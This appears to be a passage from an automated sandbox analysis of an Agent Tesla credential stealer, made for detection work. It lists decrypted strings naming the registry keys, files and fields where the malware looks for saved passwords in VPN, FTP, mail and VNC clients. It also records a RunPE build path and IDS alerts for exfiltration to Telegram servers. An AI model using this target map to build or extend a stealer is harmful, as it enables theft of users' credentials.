Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Software\OpenVPN-GUI\configs\
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: username
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: auth-data
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: entropy
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: USERPROFILE
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \OpenVPN\config\
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: remote
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: remote
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: NordVPN
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: NordVPN
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: NordVpn.exe*
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: user.config
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: //setting[@name='Username']/value
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: //setting[@name='Password']/value
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: NordVPN
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Private Internet Access
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: %ProgramW6432%
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Private Internet Access\data
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Private Internet Access\data
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \account.json
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ."username":"(.?)"
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ."password":"(.?)"
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Private Internet Access
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: privateinternetaccess.com
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: FileZilla
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: APPDATA
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: APPDATA
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <Server>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <Host>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <Host>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: </Host>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <Port>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: </Port>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <User>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <User>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: </User>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <Pass encoding="base64">
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <Pass encoding="base64">
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: </Pass>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <Pass>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <Pass encoding="base64">
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: </Pass>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: CoreFTP
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: SOFTWARE\FTPWare\COREFTP\Sites
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: User
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Host
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Port
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: hdfzpysvpzimorhk
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: WinSCP
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: HostName
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: UserName
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Password
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: PublicKeyFile
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: PortNumber
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: [PRIVATE KEY LOCATION: "{0}"]
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: WinSCP
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ABCDEF
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Flash FXP
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: port
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: user
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: pass
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: quick.dat
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Sites.dat
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \FlashFXP\
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \FlashFXP\
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: FTP Navigator
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: SystemDrive
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \FTP Navigator\Ftplist.txt
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Server
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Password
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: No Password
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: User
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: SmartFTP
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: APPDATA
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: WS_FTP
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: appdata
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: HOST
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: PWD=
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: PWD=
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: FtpCommander
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: SystemDrive
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: SystemDrive
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: SystemDrive
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \cftp\Ftplist.txt
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ;Password=
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ;User=
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ;Server=
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ;Port=
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ;Port=
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ;Password=
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ;User=
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ;Anonymous=
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: FTPGetter
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \FTPGetter\servers.xml
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <server>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <server_ip>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <server_ip>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: </server_ip>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <server_port>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: </server_port>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <server_user_name>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <server_user_name>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: </server_user_name>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <server_user_password>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <server_user_password>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: </server_user_password>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: FTPGetter
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: The Bat!
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: appdata
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \The Bat!
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Account.CFN
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Account.CFN
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Becky!
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: DataDir
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Folder.lst
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Mailbox.ini
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Account
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: PassWd
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Account
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: SMTPServer
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Account
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: MailAddress
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Becky!
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Outlook
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Email
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: IMAP Password
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: POP3 Password
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: HTTP Password
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: SMTP Password
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Email
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Email
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Email
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: IMAP Password
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: POP3 Password
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: HTTP Password
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: SMTP Password
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Server
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Windows Mail App
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Software\Microsoft\ActiveSync\Partners
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Email
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Server
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: SchemaId
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: pResourceElement
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: pIdentityElement
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: pPackageSid
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: pAuthenticatorElement
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: syncpassword
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: mailoutgoing
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: FoxMail
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Executable
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: FoxmailPath
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Storage\
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Storage\
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \mail
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \mail
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Accounts\Account.rec0
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Accounts\Account.rec0
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Account.stg
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Account.stg
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: POP3Host
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: SMTPHost
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: IncomingServer
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Account
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: MailAddress
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Password
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: POP3Password
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Opera Mail
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: opera:
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\\|';:,<>/?+=
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: PocoMail
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: appdata
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Pocomail\accounts.ini
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Email
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: POPPass
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: SMTPPass
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: SMTP
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: eM Client
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: eM Client\accounts.dat
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: eM Client
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Accounts
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: "Username":"
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: "Secret":"
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: "ProviderName":"
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: o6806642kbM7c5
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Mailbird
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: SenderIdentities
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Accounts
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Mailbird\Store\Store.db
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Server_Host
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Accounts
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Email
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Username
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: EncryptedPassword
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Mailbird
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: RealVNC 4.x
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Password
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: RealVNC 3.x
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: SOFTWARE\RealVNC\vncserver
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Password
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: RealVNC 4.x
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: SOFTWARE\RealVNC\WinVNC4
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Password
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: RealVNC 3.x
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Software\ORL\WinVNC3
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Password
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: TightVNC
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Software\TightVNC\Server
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Password
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: TightVNC
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Software\TightVNC\Server
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: PasswordViewOnly
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: TightVNC ControlPassword
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Software\TightVNC\Server
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ControlPassword
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: TigerVNC
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Software\TigerVNC\Server
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Password
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: UltraVNC
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: passwd
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: UltraVNC
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: passwd2
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: UltraVNC
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ProgramFiles
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: passwd
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: UltraVNC
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ProgramFiles
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: passwd2
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: UltraVNC
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ProgramFiles
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: passwd
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: UltraVNC
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ProgramFiles
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: passwd2
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: UltraVNC
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: passwd
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: UltraVNC
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: passwd2
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: JDownloader 2.0
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: JDownloader 2.0\cfg
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: JDownloader 2.0\cfg
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: jd.controlling.authentication.AuthenticationControllerSettings.list.ejs

Source: 08(2)_00.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49726 version: TLS 1.2

Source: 08(2)_00.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: F:\Desktop V500\important\CSharp-RunPE-master\RunPE\obj\Debug\SeaCyanPul.pdb source: 08(2)_00.exe, 00000000.00000002.1433779096.0000000005B90000.00000004.08000000.00040000.00000000.sdmp, 08(2)_00.exe, 00000000.00000002.1432087935.0000000003311000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdb source: fOLFRQq.exe, 00000003.00000000.1540965758.00000000003D2000.00000002.00000001.01000000.00000007.sdmp, fOLFRQq.exe.2.dr
Source:	Binary string: RegAsm.pdb4 source: fOLFRQq.exe, 00000003.00000000.1540965758.00000000003D2000.00000002.00000001.01000000.00000007.sdmp, fOLFRQq.exe.2.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.8:49717 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.8:49720 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.8:49706 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.8:49722 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.8:49718 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.8:49705 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.8:49705 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.8:49724 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.8:49721 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.8:49715 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.8:49727 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.8:49716 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.8:49725 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.8:49723 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.8:49726 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.8:49719 -> 149.154.167.220:443
